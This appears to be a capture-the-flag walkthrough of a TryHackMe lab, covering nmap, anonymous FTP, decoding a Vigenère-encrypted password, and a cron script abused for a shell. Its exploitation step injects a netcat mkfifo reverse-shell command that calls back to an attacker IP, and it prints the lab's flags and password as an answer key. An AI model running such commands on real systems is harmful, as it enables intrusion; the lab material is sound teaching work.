thm-breakoutthecage1-nl

Tasks

Let’s find out what his agent is up to….


#1 What is Weston’s password?
Mydadisghostrideraintthatcoolnocausehesonfirejokes
#2 What’s the user flag?
THM{M37AL_0R_P3N_T35T1NG}
#3 What’s the root flag?
THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}

Note: Try out the room on https://tryhackme.com/room/breakoutthecage1

Let's get started 🙂


  • Start the enumeration “nmap -sC -sV -T4 <IP>”
E:\PENTEST>nmap -vv -sC -sV -T4 10.10.139.25
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-06 14:28 W. Europe Summer Time
NSE: Loaded 148 scripts for scanning.
Initiating Ping Scan at 14:28
Scanning 10.10.139.25 [4 ports]
Completed Ping Scan at 14:28, 2.56s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:28
Completed Parallel DNS resolution of 1 host. at 14:28, 0.01s elapsed
Initiating SYN Stealth Scan at 14:28
Scanning 10.10.139.25 [1000 ports]
Discovered open port 80/tcp on 10.10.139.25
Discovered open port 22/tcp on 10.10.139.25
Discovered open port 21/tcp on 10.10.139.25
Scanned at 2020-08-06 14:28:08 W. Europe Summer Time for 22s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 396 May 25 23:33 dad_tasks
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.3.122
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDn+KLEDP81/6ceCvdFeDrLFYWSWc6UnOmmpiNeXuyr+GRvE5Eff4DOeTbiEIcHQkkPcz2QXiOLd9SMjCEgAqmZiZE/mv1HJpQfmRLOufOlf9oZ1TIZf7ehKcVqX0W3nuQeC+M2wLBse2lGhovnTSaZKLKRjQCP2yD1EzND/xFA88oFpahvr6vJfyGOTADjc83AJq9n3Gnil4Nd88xNsIKTl01Mm9ikE/3n/XFbwzYa2bYJRVr+lWWRd+EU3sYTY80PQgBiw6ZPT0QCe0lQfmcgCqu4hC+t/kyfmMRlbtjN/yZJ0gCWeVVAV+A4NNgsOqFbXUT+c6ATzYNhBXRojJED
| 256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA3G1rdbZBOf44Cvz2YGtC5WhIHfHQhtShY8miCVHayvHM/9reA8VvLx9jBOa+iClhm/HairgvNV6pYV6Jg6MII=
| 256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFiTPEbVpYmF2d/NDdhVYlXWA5PmTHhtrtlAaTiEuZOj
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Nicholas Cage Stories
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 24.05 seconds
Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.040KB)

E:\PENTEST>

Port 80 was open, so I went to the website and checked the page source, network requests etc., but found nothing. Then I moved on to the FTP port.

  • Connect to FTP with “ftp <IP>” and use “anonymous” as both username and password.

And we are in now!

  • List the files: there is a “dad_tasks” file; download it using “mget *”.


  • Open the file; it looks like base64, so decode it with “strings dad_tasks | base64 -d”
  • Or use Python (this session uses Python 2, where str has a “base64” codec):
    
    kali@kali:~/thm/python$ cat decode.py
    print open("FILE-WITH-STRING", "rb").read().decode("base64")
    
    kali@kali:~/thm/python$ cat FILE-WITH-STRING
    UHl0aG9uIGlzIGZ1bg==
    kali@kali:~/thm/python$ mv dad_tasks FILE-WITH-STRING
    kali@kali:~/thm/python$ python decode.py
    Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
    Sfw. Kajnmb xsi owuowge
    Faz. Tml fkfr qgseik ag oqeibx
    Eljwx. Xil bqi aiklbywqe
    Rsfv. Zwel vvm imel sumebt lqwdsfk
    Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.
    
    Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

The base64 layer only yields another encoded text; once that is decoded as well, it reads:

    Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
    One. Revamp the website
    Two. Put more quotes in script
    Three. Buy bee pesticide
    Four. Help him with acting lessons
    Five. Teach Dad what "information security" is.
    
    In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes

The readable text at the end gives the password for Task #1.

  • As Task #1 says, this is the password for “weston”, so use it to log in over SSH: “ssh weston@<IP>” with the password we just found.

  • Shortly after logging in, a message popped up on the terminal, which suggests some kind of cron job or script runs every 1–5 minutes.

Note: Download pspy64 to your local machine and then transfer it to the box using “scp <Path to pspy64> weston@<IP>:/home/weston”

Make it executable with “chmod +x pspy64” and then run “./pspy64 -pf -i 1000”.

After a while it shows some .py files being executed. (This will take some time.)

  • View the .py file: “cat /opt/.dads_scripts/spread_the_quotes.py”

The script opens the file /opt/.dads_scripts/.files/.quotes.

  • Add a netcat reverse shell to the “.quotes” file:

echo ";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Your IP> 1234 >/tmp/f" > .quotes

  • Start a listener on your local machine with “nc -lvp 1234”, wait 1–2 minutes, and the connection comes in.

Note: Once the reverse shell connects, upgrade it to a proper terminal with “python -c 'import pty; pty.spawn("/bin/bash")'”

Now the only thing left is privilege escalation to root!

We got 2 folders from user “cage”. List the “email_backup” folder and read all the emails in it; “email_3” again contains some gibberish text.

I tried to decode it using the same site, but it didn't work.

Reading the email again, the keyword to decode it appears to be “FACE”. Decode it with CyberChef using that key and you get the root password!
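Both keyword decodes on this page, the second layer of dad_tasks and email_3 with the key “FACE”, are Vigenère decryption, which is what CyberChef's keyword-based decode does. The example below is added here and is not part of the writeup; it reimplements that decode and shows why a guessable first line (“Dads Tasks - The RAGE...”) leaks the entire repeating key through a known-plaintext comparison. Only dad_tasks is decoded, since the email_3 text is not on the page; the ciphertext constant is copied from the transcript above.

```python
import string

ALPHA = string.ascii_uppercase

def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """Shift each letter back by its key letter; non-letters are kept and do not
    advance the key, and case is preserved (the same rules CyberChef applies)."""
    key = key.upper()
    out, k = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            shift = ALPHA.index(key[k % len(key)])
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)

def recover_key(ciphertext: str, known_plaintext: str) -> str:
    """Known-plaintext recovery: each (cipher, plain) letter pair leaks one key
    letter, so a guessable header exposes the whole key as soon as the known
    text is at least one key length long (shorter text yields only a prefix)."""
    c = [x.upper() for x in ciphertext if x.isalpha()]
    p = [x.upper() for x in known_plaintext if x.isalpha()]
    stream = [ALPHA[(ALPHA.index(a) - ALPHA.index(b)) % 26] for a, b in zip(c, p)]
    # The key is the shortest period that explains the whole leaked key stream.
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return "".join(stream[:period])
    return "".join(stream)

# Constructed sample: the base64-decoded dad_tasks text exactly as the
# transcript above shows it, plus the guessable first line in clear.
DAD_TASKS_CIPHER = (
    "Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!\n"
    "Sfw. Kajnmb xsi owuowge\n"
    "Faz. Tml fkfr qgseik ag oqeibx\n"
    "Eljwx. Xil bqi aiklbywqe\n"
    "Rsfv. Zwel vvm imel sumebt lqwdsfk\n"
    'Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.\n\n'
    "Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl\n"
)
HEADER = "Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!"

def decode_dad_tasks() -> tuple:
    """Recover the key from the first line alone, then decrypt the whole file."""
    key = recover_key(DAD_TASKS_CIPHER.splitlines()[0], HEADER)
    return key, vigenere_decrypt(DAD_TASKS_CIPHER, key)
```

The same `vigenere_decrypt` with the key “FACE” reproduces the CyberChef step used on email_3.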

Move to the root directory and read the flag file to finish the challenge!!!

Author : Puckiestyle